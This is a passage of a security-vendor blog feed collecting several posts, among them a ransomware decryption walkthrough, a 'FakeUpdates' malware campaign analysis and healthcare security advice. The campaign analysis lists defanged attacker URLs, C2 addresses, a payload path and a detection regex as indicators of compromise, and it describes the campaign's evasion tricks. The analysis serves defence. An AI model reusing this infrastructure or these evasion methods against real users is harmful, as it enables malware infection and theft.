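Putting the pieces together, the key-search loop can be sketched in Python as follows. The XOR routine is only a testable stand-in for the tool's AES decryption, and the names are ours, not the tool's:

```python
import hashlib

def find_key(enc_sample, clean_sample, start_seed, make_password, decrypt, limit=100):
    # Step the seed backward, derive a candidate password, hash it into
    # a key (Princess Locker used SHA-256 of the random string), and
    # test the key by decrypting a sample and comparing it against a
    # known clean copy of the same file.
    seed = start_seed
    for _ in range(limit):
        password = make_password(seed)
        key = hashlib.sha256(password.encode()).digest()
        if decrypt(enc_sample, key)[:len(clean_sample)] == clean_sample:
            return password
        seed -= 1
    return None

def xor_cipher(data, key):
    """Toy reversible 'cipher' standing in for AES in this sketch."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```

In the real tool, decrypt is the AES routine, and the two samples are one encrypted file plus a known clean copy of it.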

You may ask: Why waste time doing all the checks for the other RNGs? Why find the ext and the UID seed, when we could just start with the current time and decrement, testing if the seed works with a test AES decryption?

We could do this in theory. However, a string comparison (which is all we need to do to find the UID seed) is a much faster operation than:

  • Generating a random string
  • Hashing the string
  • Creating AES key
  • Encrypting data
  • Checking against clean file 

This is a lot more computationally intensive and would make the relatively fast UID search take much, much longer.

Because the AES key was generated during the Princess Locker execution, and the ransom note ID was generated immediately after, once we find the ransom note ID (UID), we can then expect there will only be a few seconds of difference between these two seeds. So, this loop should only need to run a few times doing the encryption checks. Hopefully, you understand the efficiency of doing it the way that hasherezade has chosen.

Finishing off the find_key function, we basically just have some checks making sure it found the right key. If not, it keeps looping and decrementing the counter until it either finds the key or hits a set limit.

Which brings us to the final portion of the main function at line 320:

If for whatever reason, it never found the correct AES password within the limit set, it most likely means that the seed time was not correct for the UID. So it will start over from the initial seed of one less than where it left off, and start this whole process over again. It will continue this until it finds a UID seed that works and a password seed close by.


Hopefully, this series has brought you up to speed on the art of finding exploits in ransomware encryption and creating decryption tools for them. Now, this is not to say that if you master this specific weakness and this decryption tool, it will be easy to find and create one for a new ransomware. But it is a step toward mastering one of the core skills.

Just like with exploit development/bug hunting, there are some core concepts and generic weaknesses that exist. The difficult/fun part is understanding the twists of those core concepts that any individual might come up with while creating their programs. It is about seeing the same concept or technique being used in an unfamiliar way, but ultimately understanding and identifying what the underlying mentality or technique is.

The important part is to understand the concepts. After that, it is a mix of creativity and thinking outside of the box to be able to identify and create your own exploits, or in our specific case, cracks for the ransomware encryption.

The post Encryption 101: decryption tool code walkthrough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Keeping your business and personal instant messages secure

Malwarebytes - Wed, 04/11/2018 - 15:00

Most people want to know their instant messages are securely wrapped up—whether that’s for personal privacy or making sure online scammers can’t grab the message content. If you’re sending text on a sensitive topic, or perhaps some photo attachments intended for one person only, you definitely wouldn’t want them falling into the wrong hands.

The same goes for business; what’s to prevent a disgruntled employee sending messages outside the network? There are a lot of solutions out there for better securing IMs. Here’s what we recommend.

The business cases

Many industries have compliance issues to contend with, and rogue IMs are one of the easiest ways to fall foul of an eye-watering fine. IM controls have been around for years as far as business is concerned, and most companies affected by this tend to have a number of solutions in place. Here are a few we suggest:

1) Securing IMs with company-issued mobile devices. Many people will happily use their own phones for work-related activities, which could pose a risk if left unsecured. You might expect these policies to be decided upon by the business itself, but that's not quite accurate, with various regulators taking a dim view of Bring Your Own Device (BYOD, a close cousin of shadow IT).

As a result, many orgs will now simply issue locked down, pre-secured phones, which don’t allow things like user initiated installation of apps. It’s also a lot easier to kill those phones remotely if lost, rather than a general smattering of panic as Steve from marketing tries to remember if he signed his personal phone up to a find my phone service.

2) The usual staff training on best practices and sensible device use, in particular extending the training into the types of message sent, and why sending company secrets around by SMS is probably a bad idea.

3) Monitor messages sent on the network. This is tricky, especially when the company decides to use an ultra-secure messaging app. How do you monitor and log the message content when everything is scrambled? Companies must decide what falls in line with their own practices, whether that’s fully secured (and thus unable to be monitored) messaging, or secured with monitoring capabilities.

There are many solutions out there which can control comms, block out keywords or phrases (and send a message back to base if it detects something like a corporate secret being mentioned), in addition to logging and archiving multiple types of IM messaging.

In fact, providers of IM for business will often include their own (occasionally limited) archiving or logging for ease of use, and will work with compliance solution providers to ensure a result which works for everyone (besides the would-be corporate secrets sharer).

Generally speaking, business IMs are much more secure than personal IMing (or at least, given the possibility of getting in trouble with the law, they should be), but the weight of said security tends to lie with the parent company. The employee is just one part of a large machine trying to keep the organisation as a whole safe from harm.

The personal cases

Of course, with the device being fully your own, you're free to break out of those necessarily restrictive business requirements and grab whatever tool you like to send an instant message. The flipside is that you're completely on your own, and the standard boilerplate caveats about “not downloading random junk that's bad for your phone” apply.

There are many, many pieces of coverage online about secure instant messaging. You can easily dig through lots of top-five-style lists and see what, exactly, is on offer versus your needs and expectations. Perhaps you want no-frills IM lockdown. Maybe you want the ability to send secure SMS, even accounting for the fact that you may need to do a little reading to help you on your way.

Whatever you need, there is absolutely going to be something out there for you which fills the gap alongside in-depth instructions for using your shiny new messaging system. Half the time, the biggest problem is convincing the friends or relatives you want to communicate securely with to download the same program. Apart from that potential roadblock, secure IM is but a few clicks away.

The real-world case

What I tend to be most interested in with regard to secure IM isn't so much the app going horribly wrong, but the possible assumption that after a quick download the job is done and your messages are safe forever. In practice, we tend to forget really obvious problems where secure bits of text are concerned. You may wish to keep the following in mind:

1) Your messages are likely more than secure enough if you’re using one of the apps from the “what’s on offer” link up above, be it Signal, Telegram, or Wickr. The problem is that you still have them all sitting there in plain text, on your phone screen, for anyone to see. While this may seem obvious, you’d be amazed at the number of people who loudly state everything from date of birth to bank details on a bus / train / plane / quite literally anything at all.

By the same token, people leave their devices unattended all over the place, often without any sort of lock screen enabled. If you have messages you’d really rather not expose to prying eyes, consider leaving them well alone in public unless absolutely necessary. If that’s not possible, be aware of your surroundings and keep an eye out for potential shoulder surfers.

You should also keep in mind that not everyone you talk to on IM may be trustworthy; sure, the messages are sent in a secure manner but that doesn’t mean the recipient can’t take a bunch of screenshots and post them online.

2) Did I mention lock screens? I hope so, because those are really, really useful for helping to ward off a case of exposed message syndrome should your phone be lost or stolen. If you have an iPad or iPhone, then this comprehensive guide to locking your screen is what you need. If you’re on Android, the same deal applies.

3) Unfortunately, the lock screen isn’t a magic bullet. Depending on your specific device, which network you’re with, and how many security options you’ve set, you may well be able to disable any locks applied via various network operated websites. In theory, a clever social engineer could pretend to be you, find the lost phone (skip this part if they stole it), and log right in.

Either way, if find my phone doesn’t work, or the device is languishing somewhere utterly inaccessible like a really big storm drain, you should have the “wipe device remotely” option available at least. Sure, your texts will go bang, but in a situation like that, you’d likely have additional content on the phone you wouldn’t want going public anyway.

The first rule of collateral damage club is don’t join collateral damage club.

Otherwise, cut your losses and hope you made a backup first.

Instant messaging might have fallen out of the news cycle a little over the years, but it never really went away and is still one of the best methods for communication around. Better than that, there’s now a truly diverse set of options available to give yourself the privacy you feel you might need when sending an IM.

You may not need locked down messaging right now, but should the situation ever arise, the tech is ready. Just make sure you have the real-world considerations locked down, too.

The post Keeping your business and personal instant messages secure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

‘FakeUpdates’ campaign leverages multiple website platforms

Malwarebytes - Tue, 04/10/2018 - 15:00

A malware campaign that appears to have been running since at least December 2017 has been gaining steam by enrolling a growing number of legitimate but compromised websites. Its modus operandi relies on social engineering users with fake but convincing update notifications.

Similar techniques were used by a group leveraging malvertising on high traffic websites such as Yahoo to distribute ad fraud malware. The patterns are also somewhat reminiscent of EITest’s HoeflerText campaign where hacked websites are scrambled and offer a font for download. More recently, there has been a campaign affecting Magento websites that also pushes fake updates (for the Flash Player) which delivers the AZORult stealer by abusing GitHub for hosting.

Today, we are looking at what we call the ‘FakeUpdates’ campaign and describing its intricate filtering and evasion techniques. One of the earliest examples we could find was reported by BroadAnalysis on December 20, 2017. The update file is not an executable but rather a script downloaded from Dropbox, a legitimate file hosting service, as can be seen in the animation below.

Figure 1: A typical redirection to the ‘FakeUpdates’ scheme from a hacked site

This campaign affects multiple Content Management Systems (CMS) in somewhat similar ways. Several of the websites we checked were outdated and therefore vulnerable to malicious code injection. It is possible that attackers used the same techniques to build their inventory of compromised sites but we do not have enough information to confirm this theory.

WordPress and Joomla

Both WordPress and Joomla sites that were hacked bear the same kind of injection within their CMS’ JavaScript files.

Figure 2: A compromised WordPress site pushing a fake Google Chrome update

Figure 3: A compromised Joomla site pushing a fake Mozilla Firefox update

Some commonly injected files include the jquery.js and caption.js libraries where code is typically appended and can be spotted by doing a comparison with a clean copy of the same file.

Figure 4: Diffing a clean and suspicious copy of the same library
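That comparison can be automated with a unified diff that keeps only the lines added to the suspect copy. Below is a minimal Python sketch using the standard difflib module; the function name is ours, for illustration:

```python
import difflib

def injected_lines(clean_text, suspect_text):
    """Return lines present in the suspect file but not in the clean one,
    i.e. the blurb an attacker appended to a legitimate library."""
    diff = difflib.unified_diff(
        clean_text.splitlines(), suspect_text.splitlines(), lineterm="")
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]
```

Running something like this against a pristine jquery.js from the vendor and the copy served by a suspect site surfaces the appended redirection code.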

The additional blurb of code is responsible for the next chain of events that loads the fraudulent layer onto the website you are visiting. The image below shows a beautified version of the code injected in the CMS platforms, whose goal is to call the redirection URL:

Figure 5: Injected code responsible for the redirection

We wrote a simple crawler to browse a list of sites and then parsed the results. We were able to identify several hundred compromised WordPress and Joomla websites after only a partial pass through the list. Although we don't have an exact number of affected sites, we surmise that it is in the thousands.

Figure 6: A partial list of compromised sites
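The core of such a crawler is a simple check applied to each fetched page. Here is a hedged sketch; the fixed 20-hex-character v= token is an assumption based on the URIs we observed, and the names are illustrative:

```python
import re

# Pattern derived from the redirection URIs seen in this campaign;
# the 20-hex-character v= token is an assumption from our samples.
PATTERN = re.compile(r"s_code\.js\?cid=(\d+)&v=[0-9a-f]{20}")

def scan_page(html):
    """Return the campaign IDs (cid values) found in a page's source."""
    return PATTERN.findall(html)
```

Feeding every crawled page through scan_page flags compromised sites and records which CMS bucket (cid) each one falls into.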


Squarespace

Squarespace is another popular Content Management System affected by the same campaign. This was pointed out by @Ring0x0, and we found a forum post dated February 28 in which a Squarespace user asks for help, saying “it basically redirected me to a full page ‘your version of chrome needs updating’”.

Figure 7: A Squarespace user reporting that their site was tampered with

So I login to the admin panel and in the GIT HISTORY it shows that one of my users which has never even logged in before, has sent an upload: site-bundle.js last week, along with some other big list of files {sic}.

We dug deeper into these compromises and identified a slightly different redirection mechanism than the one used on WordPress or Joomla sites. With Squarespace, a blurb of JavaScript is injected directly into the site’s homepage instead.

Figure 8: Traffic showing a malicious redirection taking place on a Squarespace site

It pulls a source file from query[.]network that in turn retrieves bundle.js from boobahbaby[.]com:

Figure 9: The injected code present in hacked Squarespace sites 

bundle.js contains the same script we described earlier that is used to call the redirection URL:

Figure 10: The same redirection code used in WP and Joomla infections is used here

According to this PublicWWW query, a little over 900 Squarespace sites have been injected with this malicious redirection code.

Figure 11: Identifying other hacked Squarespace sites using a string pattern

Redirection URL and filtering

All CMSes trigger redirection URIs with similar patterns that eventually load the fraudulent update theme. Based on our tests, the URIs have identifiers that map to a particular CMS; for example, cid=221 is associated with WordPress sites, while cid=208 is associated with Joomla.

WordPress:
track.positiverefreshment[.]org/s_code.js?cid=221&v=8fdbe4223f0230a93678
track.amishbrand[.]com/s_code.js?cid=205&v=c40bfeff70a8e1abc00f
track.amishbrand[.]com/s_code.js?cid=234&v=59f4ba6c3cd7f37abedc
track.amishbrand[.]com/s_code.js?cid=237&v=7e3403034b8bf0ac23c6

Joomla:
connect.clevelandskin[.]com/s_code.js?cid=208&v=e1acdea1ea51b0035267
track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba
track.amishbrand[.]com/s_code.js?cid=226&v=4d25aa10a99a45509fa2

Squarespace:
track.amishbrand[.]com/s_code.js?cid=232&v=47acc84c33bf85c5496d

Open Journal Systems:
track.positiverefreshment[.]org/s_code.js?cid=223&v=7124cc38a60ff6cb920d

Unknown CMS:
track.positiverefreshment[.]org/s_code.js?cid=211&v=7c6b1d9ec5023db2b7d9
track.positiverefreshment[.]org/s_code.js?cid=227&v=a414ad4ad38395fc3c3b

There are other interesting artifacts on this infrastructure, such as an ad rotator:

But if we focus on the redirection code itself, we notice that potential victims are fingerprinted and that the ultimate redirection to the FakeUpdates template is conditional, in particular allowing only one hit per IP address. The last JavaScript is responsible for creating the iframe URL for that next sequence.

Figure 12: Fingerprinting, cookie verification and iframe redirection are performed here

FakeUpdates theme

There are templates for the Chrome, Firefox and Internet Explorer browsers, the latter getting a bogus Flash Player update instead.


Figure 13: Attackers are targeting browsers with professional looking templates

The decoy pages are hosted on compromised hosts via subdomains, using URIs with very short life spans. Some of those domains have a live (and legitimate) website, whereas others are simply parked:

Legitimate (shadowed) domain:


Figure 14: This property’s credentials have most likely been stolen and used to register a malicious subdomain

Parked domain:


Figure 15: Parked domains can hide ulterior motives

Final infection chain and payloads

The infection starts with the fake update disguised as a JavaScript file retrieved from the Dropbox file hosting service. The link to Dropbox, which is updated at regular intervals, is obfuscated inside the first web session belonging to the fake theme.

Figure 16: the fileURL variable contains the Dropbox URL

This JavaScript is heavily obfuscated to make static analysis very difficult and also to hide some crucial fingerprinting that is designed to evade virtual machines and sandboxes.

Figure 17: The malicious JavaScript downloaded from DropBox

According to this very good and detailed analysis of the JS file, that is because step 2 of the victim profiling uses WScript.Network and WMI to collect system information (BIOS, manufacturer, architecture, MAC address, processes, etc.) and eventually decides whether to continue with the payload or end the script without delivering it.

A failed infection will only contain 2 callbacks to the C2 server:

Figure 18: A host that is not a genuine machine was detected and infection aborted

While a successful infection will contain 3 callbacks to the C2 server (including the payload):

Figure 19: When all checks pass, the user is served the payload

The encoded payload stream is decoded by wscript.exe, and a malicious binary (Chrome_71.1.43.exe in this case) is dropped in the %temp% folder. That file was digitally signed and also employed various evasion techniques (such as an immediate reboot) to defeat sandboxes.

Figure 20: A digitally signed file is no guarantee for safety

Upon examination, we determined that this is the Chthonic banking malware, a variant of ZeusVM. Once the system has restarted, Chthonic retrieves a hefty configuration file from 94.100.18[.]6/3.bin.

In a second replay attempt, we instead got the NetSupport Remote Access Tool, a commercial RAT. Its installation and configuration were already well covered in this blog. Once again, we noticed heavy use of obfuscation throughout the delivery of this program, which can be used for malicious purposes (file transfer, remote desktop, etc.).

Figure 21: Traffic from the RAT infection, showing its backend server


This campaign relies on a delivery mechanism that leverages social engineering and abuses a legitimate file hosting service. The ‘bait’ file consists of a script rather than a malicious executable, giving the attackers the flexibility to develop interesting obfuscation and fingerprinting techniques.

Compromised websites were abused to not only redirect users but also to host the fake updates scheme, making their owners unwitting participants in a malware campaign. This is why it is so important to keep Content Management Systems up to date, as well as use good security hygiene when it comes to authentication.

Malwarebytes blocks the domains and servers used in this attack, as well as the final payload.

Indicators of compromise

Redirection infrastructure:

23.152.0[.]118 84.200.84[.]236 185.243.112[.]38 eventsbysteph[.]com query[.]network connect.clevelandskin[.]net connect.clevelandskin[.]org track.amishbrand[.]com track.positiverefreshment[.]org

Dropped binaries:


6f3b0068793b277f1d948e11fe1a1d1c1aa78600712ec91cd0c0e83ed2f4cf1f 94.100.18[.]6/3.bin

NetSupport RAT


The post ‘FakeUpdates’ campaign leverages multiple website platforms appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (April 02 – April 08)

Malwarebytes - Mon, 04/09/2018 - 15:16

Last week, we took a look at fake WhatsApp antics, dubious gaming extensions, and a huge Panera Bread breach. There was also LockCrypt ransomware to contend with, we had a poke around LinkedIn, and we published another Physician, protect thyself blog.

Other news

Stay safe, everyone!

The post A week in security (April 02 – April 08) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs CTNT report shows shift in threat landscape to cryptomining

Malwarebytes - Mon, 04/09/2018 - 13:00

It’s that time again! Time for the quarterly Malwarebytes Labs Cybercrime Tactics and Techniques report (aka the Labs CTNT report). To get a more complete picture of what’s been going on in cybercrime this quarter, the Labs team has combined intel and statistics gathered from January through March 2018 from our Intelligence, Research, and Data Science teams with telemetry from both our consumer and business products, which are deployed on millions of machines.

Here’s what we learned about cybercrime in the first quarter of 2018.

Cryptomining is king

Malicious cryptomining has taken over in 2018, and it’s leaving all other malware families behind. From drive-by mining attacks via browser to scams meant to drain users’ cryptowallets, cybercriminals are taking every opportunity to exploit the rising value and popularity of Bitcoin and other cryptocurrencies.

Even though adware retained its position as our number one consumer detection, it did so only by the skin of its teeth, as malware-based cryptomining is now nipping at its heels in the number two spot. In addition, detections of cryptomining malware for businesses increased by 27 percent over last quarter, bringing it up to the second-highest overall threat detection for businesses this quarter.

Ransomware and spyware try to keep up

But while cryptomining took over, it wasn’t the only game in town. Bad actors continued to experiment with ransomware development and distribution, and spyware kept climbing the charts, usurping hijackers as our number one business detection.

January and February saw unusually low consumer ransomware detections, but during the same timeframe, we saw GandCrab appear as the first ransomware to ask its victims for a cryptocurrency other than Bitcoin. Meanwhile, business ransomware detections are up by 28 percent, but the overall volume remains low, as the threat is unable to crack into the top 5 business detections this quarter.

Spyware became our number 1 detection for businesses this quarter, with an increase of 56 percent from the previous quarter. After a dip at the end of last quarter, spyware detections crept up in December, with January being our most heavily-detected month. The spike is likely due to a malspam campaign delivering the Emotet spyware. Shortly after the spike, spyware was observed dropping significantly near the end of the quarter.

Major vulnerabilities unearthed

The public disclosure of the Meltdown and Spectre vulnerabilities sent software and hardware vendors into full-blown panic mode, releasing patch after patch to try and mitigate the damage. Cybercriminals capitalized on the fear and uncertainty by using social engineering scams to trick users into downloading the latest “patches,” only to infect them with malware.

To read more about cryptomining’s takeover, other quarterly trends in cybercrime, and our predictions for next quarter, download the full Cybercrime Tactics and Techniques (CTNT) report.

The post Labs CTNT report shows shift in threat landscape to cryptomining appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Physician, protect thyself: An ounce of prevention is worth a pound of cure

Malwarebytes - Fri, 04/06/2018 - 18:33

In part one of our Physician, protect thyself series, we recognized significant security problems within the healthcare industry that need addressing. Health organizations moving from the paper to the ‘puter—a shift meant to improve care and overall patient experience—inadvertently introduced substantial privacy risks to healthcare records, which are suddenly accessible whenever and wherever the patient or medical staff is. Not only that, patient records are now as portable, transferable, alterable, and destructible as they can be—by both good and bad actors. The interconnectedness of devices and systems further compounds the risk.

BYOD, the boom of mHealth apps, the cloud, and the lack of awareness among staff have made healthcare cybersecurity more challenging than ever.

These are challenges that, thankfully, two particular staff members of small- to medium-sized hospitals or clinics can tackle, with a little help from others: the Manager and the IT Specialist. They are the prime movers in turning things around for healthcare SMBs (with proper security guidance, of course).

So in part two of this series, we’ll provide them with tips to prepare for new responsibilities that directly affect the state of cybersecurity and privacy readiness.

Did someone say “CISO”?

Security consultants in the healthcare industry advise all organizations to hire their own Chief Information Security Officer (CISO), as health records being moved online calls for information security to be at the forefront of any strategy. Some larger hospitals can likely accommodate this position in their ranks; however, this may not be possible for smaller ones.

For one, healthcare organizations, like other industries, are seeing a shortage of IT security talent, because technologies are being adopted faster than people can be trained to manage, maintain, and secure them. For another, a majority of healthcare facilities devote only a small budget to security. Given all this, it's not surprising to find that computer systems in SMB hospitals and clinics are ill-equipped to handle cyberattacks, much less have a dedicated IT person overseeing them.

Facing challenges like these, organizations can look into several low-cost alternatives:

  • Engage the services of a virtual CISO (vCISO), which some companies offer
  • Hire internally
  • Expand the job descriptions of particular individuals in the right positions

With point three in mind, the manager position is the likely role to be awarded additional tasks—and for a good reason. Managers have oversight on people, policies, organizational strategy, resources, and communication. And when it comes to introducing change, managers are responsible for planning the direction, communicating it, and overseeing the changes taking place.

The Health Information Manager (HIM), also known as the Health Information Administrator, is viewed as the information specialist in healthcare, as they are responsible for obtaining, examining, ensuring the accuracy of, and protecting patient medical information.

While it is great news that healthcare is now setting an exponentially higher budget for cybersecurity, this money mostly goes toward buying technologies and solutions, not hiring. As such, there is still a need for the right people to do the job.

And so, without further ado…

The Manager

To up their game, managers must begin thinking about cybersecurity and privacy, and find ways to incorporate them into the daily duties of staff within the facility.

Review current practices

A good place for managers to start is to review current physical security measures they practice within and without hospital or clinical premises. Now you might think, “Hang on, why should managers look into how they lock their doors first when we’re talking about cybersecurity?” What most of us may not realize is that computer security starts with physical security. Is it any wonder that some cybersecurity experts are also fond of lock picking?

Physical security is often overlooked and underestimated. Worse, it is seldom talked about within cybersecurity. With healthcare organizations and facilities that heavily rely on medical devices, systems, and health information all linked together in a network, the need for physical security becomes very real the moment when, say, a DDoS attack renders systems inoperable and causes a power outage that prevents doctors from performing serious care or emergency surgeries in the ICU.

It is imperative that managers think back and assess where the facility stands on compliance with the industry standards and security frameworks they've adopted.

More importantly, managers must review the facility’s information lifecycle—the stages through which records go—from its creation to its archiving or destruction. Consider the following questions:

  • Have staff consistently followed proper protocol when it comes to the disposal of printed-out patient records and other medical documents? (e.g., Do they just dispose of them in public dumpsters or other containers that are accessible to the public or unauthorized persons?)
  • Have staff consistently followed proper protocol when it comes to the reuse of office furniture where physical or electronic records are kept and/or electronic media (such as CDs and USB sticks)?
  • Are confidential and non-confidential data stored in separate spaces?
  • Are stored records and other sensitive documents encrypted?
  • What’s the policy on data retention?
Identify feasible threats and vulnerabilities

The Manager must then identify what measures need improvement, what additional security procedures they should introduce, and what practices they can scrap (if any) and replace with something more efficient, sound, manageable, and repeatable. This process is called risk assessment. And the Manager may need to talk to staff and third-party vendors for their input.

Consider the following questions:

  • What could possibly happen if a member of staff lost his/her access cards and went unreported for a few days?
  • What could possibly happen if USB ports on computers and devices are left open?
  • How many external vendors have access to their records and/or facility?
  • Can staff access the open web on any computer terminal?
  • Should they consider getting an insurance policy in case of potential damages incurred in the event of a cyberattack?

Note that a regular review (e.g., once a year) of potential vulnerabilities is needed to be on top of critical weaknesses that need to be prioritized.

Introduce a culture of cybersecurity

Educating employees is the first step, but it doesn't end there. Education is merely part of the security culture the Manager would want to incorporate into the bigger cultural setup in healthcare. His/her ultimate aim is to instill security practices in staff to the point that following them comes naturally, whether they're within the facility or outside it.

This is the foreseen outcome of an intentional culture of security: people think, act, and behave the same way no matter where they are or where they work. For example, if healthcare personnel are trained to treat links and attachments in emails as suspect, they will likely act the same way when they check email at home.

I mentioned before that people generally have a negative perception of security, and the Manager must realize this. Doing so can help him/her change the tone and language used when introducing this new culture into an already complicated setup.

As champion, the Manager must create a narrative focusing on the benefits of staff practicing basic security hygiene and playing their part in securing patient health records. In addition, he/she should make clear that training and awareness campaigns are in place not to hinder or delay patient care, but to increase patient satisfaction by improving the odds that their PHI stays safe.

Create a cybersecurity training plan

If the Manager doesn’t know where to start in drafting a training plan, the SANS Institute, a company specializing in cybersecurity training and information security, has a robust toolkit they can use to start this off. They may wish to cover the following topics in the plan:

  • Definition of terms, such as phishing
  • Social engineering tactics
  • Scams and fraud tactics
  • Extra: Good computing habits in the workplace
  • Extra: Workplace social media security
Update the hospital or clinic policy to include a section on cybersecurity

To further drive home the need for change and to foster accountability on everyone within the facility, the Manager must also update the current policies to include cybersecurity. At this point, he/she may already have an idea of what to add, given that they already did a review of current practices and assessed potential threats and vulnerabilities in the existing hospital or clinic setup.

Other items the Manager should include in the new section of the policy are:

  • What security software programs are/should be running on endpoints
  • For endpoints facing the open web, what browser and plugins should be installed
  • How, and how often, sensitive information or PHI is backed up
  • How and when software updates will be applied
  • Which users have admin rights on endpoints
  • Who is responsible for maintaining, enforcing, and reviewing the cybersecurity policy

The Manager must also address security concerns surrounding BYOD, the cloud, internal WiFi, and even working remotely, as many healthcare practitioners have already welcomed these.

Include acceptable usage guidelines, stressing the importance of locking machines, devices, and accounts using multi-factor authentication, and explain how to report security incidents should a staff member encounter one. Furthermore, the policy must clearly state what will happen if a staff member is found to be non-compliant, especially in the event of a breach.

After updating the policy, the Manager must then set a review period for the cybersecurity policy to keep it current and relevant.

Read: How to create a successful cybersecurity policy

The IT Specialist

For some SMBs, having a dedicated IT department or person is quite uncommon. Many believe they don't really need one as long as someone is responsible for overseeing IT support tasks and ensuring that sensitive information is stored and appropriately protected at all times. However, this may not apply to SMB hospitals and clinics, given the round-the-clock nature of their availability and care.

Since the lack of a dedicated specialist means such IT tasks will likely fall into the hands of the Manager, we highly suggest hiring for a specialized IT role. Not only would this ease the burden on managers, who on top of a full plate are also involved in the care of patients; it would also let the IT person focus on providing support for staff and patient needs that only a specialist can offer.

These tasks include (but are not limited to) installing and maintaining software on endpoints, configuring hardware to ensure they follow industry standards and internal policies, and monitoring the network for any form of intrusion.

Note that the IT role can be a temporary one: current technology has made it possible for SMBs to survive without an in-house specialist. Healthcare SMBs can also take this route if budget constraints prevent them from keeping an IT person in the long run.

Should the healthcare facility require IT support, it can always engage third parties to provide it. Outsourcing IT needs can also avoid the high turnover of professionals that many healthcare SMBs experience, and address the constant monitoring and management of BYOD devices. Of course, contracted IT staff must be bound by the facility's security policies, for its own safety and the safety of its patients' sensitive information.

Regardless of who is wearing the IT tinfoil hat, we suggest the following to beef up the security of the healthcare facility and the scores of valuable data they house.

Introduce an identity and access management (IAM) system

An IAM is a framework that businesses of all sizes use to manage digital identities. It allows active employees to access various accounts without the need for multiple logins. With the guidance of the Manager, IT can use an IAM to limit the number of accounts a particular group of employees can access.

Examples of such systems are Okta, OneLogin, Centrify, and SailPoint. It’s important for healthcare facilities to control who accesses what accounts or systems to foster accountability and minimize unauthorized access or disclosure of information, either done maliciously or as a result of negligence on the part of the staff.

Schedule regular backup and encryption of information

Now more than ever, backing up files has become a necessity, thanks to the proliferation of ransomware. In a previous post, we described the 3-2-1 backup method, which goes like this:

  • Make 3 different copies of your data
  • Store 2 copies in different forms of media
  • Store 1 copy offsite

Furthermore, do not just back up the data; encrypt it as well.
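As a rough illustration only (the paths, function name, and destinations below are hypothetical, not part of any product), the 3-2-1 rule can be sketched in a few lines:

```python
import shutil
from pathlib import Path

def backup_3_2_1(source: Path, local_copy: Path, second_medium: Path, offsite: Path) -> None:
    """Copy `source` to three destinations: another local disk, a second
    medium (e.g. a mounted USB drive), and an offsite location (e.g. a
    directory synced to cloud storage). Encrypt before copying in practice."""
    for dest in (local_copy, second_medium, offsite):
        dest.mkdir(parents=True, exist_ok=True)
        shutil.copy2(source, dest / source.name)  # copy2 preserves metadata
```

A real deployment would of course add encryption and verification on top of the copies.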

Read: Backup and lockdown: when device theft strikes

Schedule regular software patching

Perhaps this measure alone would stop a large chunk of attacks, given that most healthcare facilities, regardless of size, run on outdated operating systems and other software.

Disable USB ports on endpoints that do not need them

There are many ways things can go wrong if an endpoint has an open USB port that anyone can plug into. Sure, charging a smartphone may be the most benign use, but open USB ports also encourage staff to plug in potentially risky external drives. It is safer to disable ports physically or via the Windows registry to mitigate the spread of malware and even the theft of highly sensitive data.

Tackle issues surrounding free, in-house WiFi

It’s not uncommon for SMB hospitals and clinics to offer free WiFi to patients, visitors, and staff within the facility. The IT specialist must set up the network to meet the needs of both staff and non-staff, starting with making sure that:

  • The main network is separate from the guest network
  • The main network will be able to handle heavy traffic from multiple endpoints, including healthcare IoT devices, and support bandwidth-intensive transfers, such as voice over wireless LAN
  • The main network is encrypted (WPA)
  • The main network must not be used by personal devices, such as smartphones, tablets, or laptops (but this can be on a case-to-case basis)
  • The guest network must have a limited bandwidth
  • The guest network must have certain websites blocked to discourage bandwidth hogging
  • The guest network must not be able to retrieve sensitive records belonging to patients or the facility
  • The guest network must be secured with a password
  • Users are informed about the facility’s Acceptable Use Policy
Draft a business continuity/disaster recovery plan

The IT Specialist must work with the Manager in creating a plan on what the hospital or clinic will do during and after a breach. After all, as we keep saying, “It’s no longer a matter of ‘if’ but ‘when’ a breach will happen,” so everyone must expect that it will at some point. If they need further help on this, there are guides and templates available online they can customize to their needs. Here’s one from SANS.

Consider using virtualization

Sensitive files leaving the facility's servers has always been a great concern for healthcare, and for many organizations, virtualization has helped mitigate this pain point. But because healthcare differs from other industries, the pros and cons of virtualization must be weighed carefully: it may introduce complexities the facility is not equipped to handle. One possible problem is server or application downtime, which can halt care operations for a period.


Benjamin Franklin once said that an ounce of prevention is worth a pound of cure. That has never been truer than it is today.

It is encouraging to find that current healthcare leaders are making mature and quick strides in cybersecurity. Studies have shown that the majority of threats aimed at the healthcare industry are preventable, and can be mitigated with proper staff education and training, consistent follow-through, enforcement of security policies, and continuous compliance with industry standards.

If the Manager and the IT Specialist continue to work with staff and their own resources, they will have already taken that first difficult step toward a more secure healthcare facility.

The post Physician, protect thyself: An ounce of prevention is worth a pound of cure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Maybe you shouldn’t use LinkedIn

Malwarebytes - Thu, 04/05/2018 - 12:00

For users in outward-facing professions like sales or marketing, social media—in particular, LinkedIn—is a highly popular means of connecting to new opportunities in the field and staying current with industry peers.

For the rest of us, LinkedIn is an outstanding means of aggregating personal information without significant safety controls, irritating all your email contacts, and providing an endless stream of phishes, honeytraps, and scams to security personnel.

While many of us do not have the luxury of severing from social media without a second thought, we do think it’s worth knowing what’s happening with your data at LinkedIn and making an informed decision—just as we suggested for users of Facebook confronting the Cambridge Analytica fiasco.

The privacy controls

Originally, LinkedIn started with not much concern for privacy. If you’re on a social media platform, you want to share, right? Well, typically that’s at your discretion, not an algorithm’s (and certainly not one that loves to share indiscriminately).

Today, LinkedIn has done quite a bit better at making their privacy controls accessible and easier to understand, but it still has a few problems baked into the core of the service.

Google indexing

Currently, new profiles default to allowing search engine crawlers to access your name, title, current company, and picture. While you can switch that option off easily, if you don't do it quickly enough, that info will be indexed and public, irrespective of any subsequent privacy changes you make.

Searching within LinkedIn based on information you get from Google Cache will often yield profiles of people who thought they had set their data to private.

Relationship weighting yields increased access automatically

One thing the late, unlamented Google Plus did right was to sever symmetric access levels for connections. While you could choose to disclose everything to a connection, the other person wasn't obligated to do the same to communicate with you.

